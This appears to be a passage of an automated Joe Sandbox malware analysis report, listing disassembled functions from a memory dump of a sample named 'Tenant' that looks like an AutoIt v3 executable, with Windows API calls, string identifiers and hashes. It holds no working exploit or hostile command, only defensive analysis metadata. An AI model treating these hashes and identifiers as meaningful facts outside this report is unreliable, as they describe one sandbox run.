                                                                                        • DrawFocusRect.USER32(?,?), ref: 00B2B0AF
                                                                                        • GetSysColor.USER32(00000011), ref: 00B2B0BD
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00B2B0C5
                                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00B2B0D9
                                                                                        • SelectObject.GDI32(?,00B2AC1F), ref: 00B2B0F0
                                                                                        • DeleteObject.GDI32(?), ref: 00B2B0FB
                                                                                        • SelectObject.GDI32(?,?), ref: 00B2B101
                                                                                        • DeleteObject.GDI32(?), ref: 00B2B106
                                                                                        • SetTextColor.GDI32(?,?), ref: 00B2B10C
                                                                                        • SetBkColor.GDI32(?,?), ref: 00B2B116
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                        • String ID:
                                                                                        • API String ID: 1996641542-0
                                                                                        • Opcode ID: febaeb279a2938d4cc3bd91ce3d3a586b0be7af72d3b910eb4da9705b3c93e3f
                                                                                        • Instruction ID: 058e4eacf9c543dc78f6dc0b229277d30af7c95f567e56619baef9710a4ae8d2
                                                                                        • Opcode Fuzzy Hash: febaeb279a2938d4cc3bd91ce3d3a586b0be7af72d3b910eb4da9705b3c93e3f
                                                                                        • Instruction Fuzzy Hash: 75616C71910218AFDF11AFA4DD88EAE7BB9FF08320F214155F919AB2A1DB759D40CF90
                                                                                        Function 00B28FFA Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00B290EA
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B290FB
                                                                                        • CharNextW.USER32(0000014E), ref: 00B2912A
                                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00B2916B
                                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00B29181
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B29192
                                                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00B291AF
                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00B291FB
                                                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00B29211
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B29242
                                                                                        • _memset.LIBCMT ref: 00B29267
                                                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00B292B0
                                                                                        • _memset.LIBCMT ref: 00B2930F
                                                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00B29339
                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00B29391
                                                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00B2943E
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00B29460
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B294AA
                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B294D7
                                                                                        • DrawMenuBar.USER32(?), ref: 00B294E6
                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00B2950E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                        • String ID: 0
                                                                                        • API String ID: 1073566785-4108050209
                                                                                        • Opcode ID: b682917ab88daa5d05e6c68e4af743373831f502a11089bc37b4419c6810d2fd
                                                                                        • Instruction ID: 8c599f7c2a0235073146376f54329bae71bb64ed6a5c1a70eec084b8e0e180bc
                                                                                        • Opcode Fuzzy Hash: b682917ab88daa5d05e6c68e4af743373831f502a11089bc37b4419c6810d2fd
                                                                                        • Instruction Fuzzy Hash: 26E18E71900228AFDF209F51DC84EEE7BB8EF05710F10819AF91DAB291DB749A81DF61
                                                                                        Function 00B24ECC Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCursorPos.USER32(?), ref: 00B25007
                                                                                        • GetDesktopWindow.USER32 ref: 00B2501C
                                                                                        • GetWindowRect.USER32(00000000), ref: 00B25023
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00B25085
                                                                                        • DestroyWindow.USER32(?), ref: 00B250B1
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B250DA
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B250F8
                                                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00B2511E
                                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 00B25133
                                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00B25146
                                                                                        • IsWindowVisible.USER32(?), ref: 00B25166
                                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00B25181
                                                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00B25195
                                                                                        • GetWindowRect.USER32(?,?), ref: 00B251AD
                                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00B251D3
                                                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 00B251ED
                                                                                        • CopyRect.USER32(?,?), ref: 00B25204
                                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00B2526F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                        • String ID: ($0$tooltips_class32
                                                                                        • API String ID: 698492251-4156429822
                                                                                        • Opcode ID: f9beaa2c865d53e4cae403a16c48b2929f868aea988cd15c4b705c473b5111c0
                                                                                        • Instruction ID: 9c396e8fb940855c09fe65190b1539948b4cc596aa1847878d49f2695d8f9480
                                                                                        • Opcode Fuzzy Hash: f9beaa2c865d53e4cae403a16c48b2929f868aea988cd15c4b705c473b5111c0
                                                                                        • Instruction Fuzzy Hash: C3B19770614710AFDB14DF64D989B6EBBE4FF88310F008A58F5999B2A1DB70E804CB96
                                                                                        Function 00B0498A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00B0499C
                                                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00B049C2
                                                                                        • _wcscpy.LIBCMT ref: 00B049F0
                                                                                        • _wcscmp.LIBCMT ref: 00B049FB
                                                                                        • _wcscat.LIBCMT ref: 00B04A11
                                                                                        • _wcsstr.LIBCMT ref: 00B04A1C
                                                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00B04A38
                                                                                        • _wcscat.LIBCMT ref: 00B04A81
                                                                                        • _wcscat.LIBCMT ref: 00B04A88
                                                                                        • _wcsncpy.LIBCMT ref: 00B04AB3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                        • API String ID: 699586101-1459072770
                                                                                        • Opcode ID: dade7a2df9a865cf2fff201913fc6c5aeaf776bbc66b431fe50f1fd3be90e479
                                                                                        • Instruction ID: bb8ab1025fed88c28024097a0ca2ae51a6ed0184143196a31ce3171c161e94cb
                                                                                        • Opcode Fuzzy Hash: dade7a2df9a865cf2fff201913fc6c5aeaf776bbc66b431fe50f1fd3be90e479
                                                                                        • Instruction Fuzzy Hash: D34104B2640204BADB11B7648E43FBF7BBCDF45710F11409EFA04A61D2EB319E1196B5
                                                                                        Function 00AA2BA9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AA2C8C
                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00AA2C94
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AA2CBF
                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00AA2CC7
                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00AA2CEC
                                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00AA2D09
                                                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00AA2D19
                                                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00AA2D4C
                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00AA2D60
                                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 00AA2D7E
                                                                                        • GetStockObject.GDI32(00000011), ref: 00AA2D9A
                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA2DA5
                                                                                          • Part of subcall function 00AA2714: GetCursorPos.USER32(?), ref: 00AA2727
                                                                                          • Part of subcall function 00AA2714: ScreenToClient.USER32(00B677B0,?), ref: 00AA2744
                                                                                          • Part of subcall function 00AA2714: GetAsyncKeyState.USER32(00000001), ref: 00AA2769
                                                                                          • Part of subcall function 00AA2714: GetAsyncKeyState.USER32(00000002), ref: 00AA2777
                                                                                        • SetTimer.USER32(00000000,00000000,00000028,00AA13C7), ref: 00AA2DCC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                        • String ID: AutoIt v3 GUI
                                                                                        • API String ID: 1458621304-248962490
                                                                                        • Opcode ID: 83038b531a8761b136add20218d81fc1c612d2fafd87d47a21f355744d6d6b8a
                                                                                        • Instruction ID: f79768d1d7abc24a915cc03ca85c39ed5af9b9fe84fada7d5b8d71f6a9fdb797
                                                                                        • Opcode Fuzzy Hash: 83038b531a8761b136add20218d81fc1c612d2fafd87d47a21f355744d6d6b8a
                                                                                        • Instruction Fuzzy Hash: 81B14D7165020AAFDB14DFA8DD99BAD7BB5FF08314F104229FA16A72D0DB74A850CF50
                                                                                        Function 00AC0429 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AB1821: _memmove.LIBCMT ref: 00AB185B
                                                                                        • GetForegroundWindow.USER32(00B30980,?,?,?,?,?), ref: 00AC04E3
                                                                                        • IsWindow.USER32(?), ref: 00AF66BB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Foreground_memmove
                                                                                        • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                        • API String ID: 3828923867-1919597938
                                                                                        • Opcode ID: 90412d439a20b51f491b148aec4a9511c2bc75c2af44d8c62043bb442d4d8dc2
                                                                                        • Instruction ID: d0d8504b1b3c693f8ec759344a5b58b20eabc5f5d9d7a482ce80c3c3e98c89a8
                                                                                        • Opcode Fuzzy Hash: 90412d439a20b51f491b148aec4a9511c2bc75c2af44d8c62043bb442d4d8dc2
                                                                                        • Instruction Fuzzy Hash: 7FD1E530104206EFCB08EFA0C691EAAFBB5BF54344F104A5DF956975A2DB30FA59CB91
                                                                                        Function 00B2441F Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00B244AC
                                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00B2456C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                        • API String ID: 3974292440-719923060
                                                                                        • Opcode ID: bb3fcd27435489c2d5e47cedd353c80b55555d23d65f5fb0f010e6ed986bf3c4
                                                                                        • Instruction ID: ecc0727f662d9b5fee0a92f7ceb2c792b7c99670f5cfaaa4ddc0b6b0a3753625
                                                                                        • Opcode Fuzzy Hash: bb3fcd27435489c2d5e47cedd353c80b55555d23d65f5fb0f010e6ed986bf3c4
                                                                                        • Instruction Fuzzy Hash: 8BA15E302143119FCB14EF60DA51E6AB7E5EF99314F1049A8B8AA5B7E2DF30ED09CB51
                                                                                        Function 00B156C8 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00B156E1
                                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00B156EC
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00B156F7
                                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00B15702
                                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00B1570D
                                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 00B15718
                                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 00B15723
                                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00B1572E
                                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00B15739
                                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 00B15744
                                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00B1574F
                                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00B1575A
                                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 00B15765
                                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00B15770
                                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 00B1577B
                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00B15786
                                                                                        • GetCursorInfo.USER32(?), ref: 00B15796
                                                                                        • GetLastError.KERNEL32(00000001,00000000), ref: 00B157C1
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$Load$ErrorInfoLast
                                                                                        • String ID:
                                                                                        • API String ID: 3215588206-0
                                                                                        • Opcode ID: 003c9a024ad3333b505f79881985f461f838e841cc7fdc4113c10ac1679eb30d
                                                                                        • Instruction ID: 273f6371efbb25f56a582bca600d7dcc0a0c4677f98d8796fe553599bf73595f
                                                                                        • Opcode Fuzzy Hash: 003c9a024ad3333b505f79881985f461f838e841cc7fdc4113c10ac1679eb30d
                                                                                        • Instruction Fuzzy Hash: 13416870E04319AADB209FB68C49D6EFFF8EF91B10B10452FE509E7291DAB86540CE61
                                                                                        Function 00AFB13A Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00AFB17B
                                                                                        • __swprintf.LIBCMT ref: 00AFB21C
                                                                                        • _wcscmp.LIBCMT ref: 00AFB22F
                                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00AFB284
                                                                                        • _wcscmp.LIBCMT ref: 00AFB2C0
                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00AFB2F7
                                                                                        • GetDlgCtrlID.USER32(?), ref: 00AFB349
                                                                                        • GetWindowRect.USER32(?,?), ref: 00AFB37F
                                                                                        • GetParent.USER32(?), ref: 00AFB39D
                                                                                        • ScreenToClient.USER32(00000000), ref: 00AFB3A4
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00AFB41E
                                                                                        • _wcscmp.LIBCMT ref: 00AFB432
                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00AFB458
                                                                                        • _wcscmp.LIBCMT ref: 00AFB46C
                                                                                          • Part of subcall function 00AC385C: _iswctype.LIBCMT ref: 00AC3864
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                        • String ID: %s%u
                                                                                        • API String ID: 3744389584-679674701
                                                                                        • Opcode ID: 1856e31e0b3bab8419d0d9ff6269f8ad437f060bec44f28be4251e10f5ccdea7
                                                                                        • Instruction ID: 4c100cfd67ee24b0da8fc39d33a4ef46bc17e818f2ec3e42e7ddc4ff898a5c89
                                                                                        • Opcode Fuzzy Hash: 1856e31e0b3bab8419d0d9ff6269f8ad437f060bec44f28be4251e10f5ccdea7
                                                                                        • Instruction Fuzzy Hash: 4EA1DE7122420AAFDB14DFA4C994FBAB7F8FF44351F108619FA99C2191DB30E955CBA0
                                                                                        Function 00AFBA6D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 00AFBAB1
                                                                                        • _wcscmp.LIBCMT ref: 00AFBAC2
                                                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 00AFBAEA
                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 00AFBB07
                                                                                        • _wcscmp.LIBCMT ref: 00AFBB25
                                                                                        • _wcsstr.LIBCMT ref: 00AFBB36
                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00AFBB6E
                                                                                        • _wcscmp.LIBCMT ref: 00AFBB7E
                                                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 00AFBBA5
                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00AFBBEE
                                                                                        • _wcscmp.LIBCMT ref: 00AFBBFE
                                                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 00AFBC26
                                                                                        • GetWindowRect.USER32(00000004,?), ref: 00AFBC8F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                        • String ID: @$ThumbnailClass
                                                                                        • API String ID: 1788623398-1539354611
                                                                                        • Opcode ID: 4a4bd1cdeb9ae97400babfca7f0d6f364e4a7f8cf49d37450ed6f08f3ef8ec9a
                                                                                        • Instruction ID: 33a540c7bd80c68bcca77f0490611b6aa610c0cba271dc32e78bd36496415ae6
                                                                                        • Opcode Fuzzy Hash: 4a4bd1cdeb9ae97400babfca7f0d6f364e4a7f8cf49d37450ed6f08f3ef8ec9a
                                                                                        • Instruction Fuzzy Hash: 7181BD710142099FDB00DF94C981FBA7BE8EF48354F148569FE899A096DB30DD46CB71
                                                                                        Function 00AFB8B6 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp
                                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                        • API String ID: 1038674560-1810252412
                                                                                        • Opcode ID: 181c2cceef4495c5726ba8de69cfce1a0cc7f0ae16c02794c347b3b2213dbdf9
                                                                                        • Instruction ID: f683425413870540407f07c92281fef233f49014935af827b8f050c18b97f66c
                                                                                        • Opcode Fuzzy Hash: 181c2cceef4495c5726ba8de69cfce1a0cc7f0ae16c02794c347b3b2213dbdf9
                                                                                        • Instruction Fuzzy Hash: FB31A671540209A6DF14FB90CE93FFD77F8AF14751F600265FA41710E2EF965E088562
                                                                                        Function 00AFCB97 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadIconW.USER32(00000063), ref: 00AFCBAA
                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00AFCBBC
